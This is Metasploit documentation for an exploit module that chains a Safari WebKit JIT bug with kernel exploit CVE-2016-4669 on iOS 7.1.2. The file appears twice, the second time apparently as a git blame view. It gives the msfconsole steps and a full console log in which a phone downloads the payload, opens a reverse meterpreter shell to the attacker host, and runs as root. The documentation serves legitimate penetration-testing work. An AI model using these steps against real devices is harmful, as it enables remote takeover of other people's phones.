documentation/modules/exploit/apple_ios/browser/safari_jit.md

## Vulnerable Application

This module exploits a JIT optimization bug in Safari Webkit. This allows us to
write shellcode to an RWX memory section in JavaScriptCore and execute it. The
shellcode contains a kernel exploit (CVE-2016-4669) that obtains kernel rw,
obtains root and disables code signing. Finally we download and execute the
meterpreter payload.

This module has been tested against iOS 7.1.2 on an iPhone 4.

## Verification Steps

1. Start msfconsole
1. Do: `use exploit/apple_ios/browser/safari_jit`
1. Do: `set lhost [ip]`
1. Do: `set srvhost [ip]`
1. Do: `run`
1. Browse to the website with a vulnerable device
1. You should get a root shell.

## Options

### DEBUG_EXPLOIT

Show debug information during exploitation.  This will add entries to the iPhone syslog related to exploitation and
loading of the payload.  Defaults to `false`

## Scenarios


### iPhone 4 with iOS 7.1.2

```
msf5 > use exploit/apple_ios/browser/safari_jit
[*] Using configured payload apple_ios/armle/meterpreter_reverse_tcp
msf5 exploit(apple_ios/browser/safari_jit) > set lhost 1.1.1.1
lhost => 1.1.1.1
msf5 exploit(apple_ios/browser/safari_jit) > set srvhost 1.1.1.1
srvhost => 1.1.1.1
msf5 exploit(apple_ios/browser/safari_jit) > set verbose true
verbose => true
msf5 exploit(apple_ios/browser/safari_jit) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf5 exploit(apple_ios/browser/safari_jit) > 
[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Using URL: http://1.1.1.1:8080/
[*] Server started.
[*] 2.2.2.2    safari_jit - Request / from Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
[*] 2.2.2.2    safari_jit - Request /loader.b64?cache=1596557302841 from Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
[*] 2.2.2.2    safari_jit - Request /macho.b64?cache=1596557303179 from Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
[*] 2.2.2.2    safari_jit - Request /payload from MobileSafari/9537.53 CFNetwork/672.1.15 Darwin/14.0.0
[+] 2.2.2.2    safari_jit - Target is vulnerable, sending payload!
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:49299) at 2020-08-04 12:08:27 -0400
sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: root @ iPhone (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer     : 2.2.2.2
OS           : iPhone3,3 (iOS 11D257)
Architecture : armv7
BuildTuple   : arm-iphone-darwin
Meterpreter  : armle/apple_ios
```
add docs to safari jit 2020-08-13 14:26:41 -04:00			`## Vulnerable Application`

			`This module exploits a JIT optimization bug in Safari Webkit. This allows us to`
			`write shellcode to an RWX memory section in JavaScriptCore and execute it. The`
			`shellcode contains a kernel exploit (CVE-2016-4669) that obtains kernel rw,`
			`obtains root and disables code signing. Finally we download and execute the`
			`meterpreter payload.`

			`This module has been tested against iOS 7.1.2 on an iPhone 4.`

			`## Verification Steps`

			`1. Start msfconsole`
			1. Do: `use exploit/apple_ios/browser/safari_jit`
			1. Do: `set lhost [ip]`
			1. Do: `set srvhost [ip]`
			1. Do: `run`
			`1. Browse to the website with a vulnerable device`
			`1. You should get a root shell.`

			`## Options`

			`### DEBUG_EXPLOIT`

			`Show debug information during exploitation. This will add entries to the iPhone syslog related to exploitation and`
			loading of the payload. Defaults to `false`

			`## Scenarios`


			`### iPhone 4 with iOS 7.1.2`

			```
			`msf5 > use exploit/apple_ios/browser/safari_jit`
			`[*] Using configured payload apple_ios/armle/meterpreter_reverse_tcp`
			`msf5 exploit(apple_ios/browser/safari_jit) > set lhost 1.1.1.1`
			`lhost => 1.1.1.1`
			`msf5 exploit(apple_ios/browser/safari_jit) > set srvhost 1.1.1.1`
			`srvhost => 1.1.1.1`
			`msf5 exploit(apple_ios/browser/safari_jit) > set verbose true`
			`verbose => true`
			`msf5 exploit(apple_ios/browser/safari_jit) > run`
			`[*] Exploit running as background job 0.`
			`[*] Exploit completed, but no session was created.`
			`msf5 exploit(apple_ios/browser/safari_jit) >`
			`[*] Started reverse TCP handler on 1.1.1.1:4444`
			`[*] Using URL: http://1.1.1.1:8080/`
			`[*] Server started.`
			`[*] 2.2.2.2 safari_jit - Request / from Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53`
			`[*] 2.2.2.2 safari_jit - Request /loader.b64?cache=1596557302841 from Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53`
			`[*] 2.2.2.2 safari_jit - Request /macho.b64?cache=1596557303179 from Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53`
			`[*] 2.2.2.2 safari_jit - Request /payload from MobileSafari/9537.53 CFNetwork/672.1.15 Darwin/14.0.0`
			`[+] 2.2.2.2 safari_jit - Target is vulnerable, sending payload!`
			`[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:49299) at 2020-08-04 12:08:27 -0400`
			`sessions -i 1`
			`[*] Starting interaction with 1...`

			`meterpreter > getuid`
			`Server username: root @ iPhone (uid=0, gid=0, euid=0, egid=0)`
			`meterpreter > sysinfo`
			`Computer : 2.2.2.2`
			`OS : iPhone3,3 (iOS 11D257)`
			`Architecture : armv7`
			`BuildTuple : arm-iphone-darwin`
			`Meterpreter : armle/apple_ios`
			```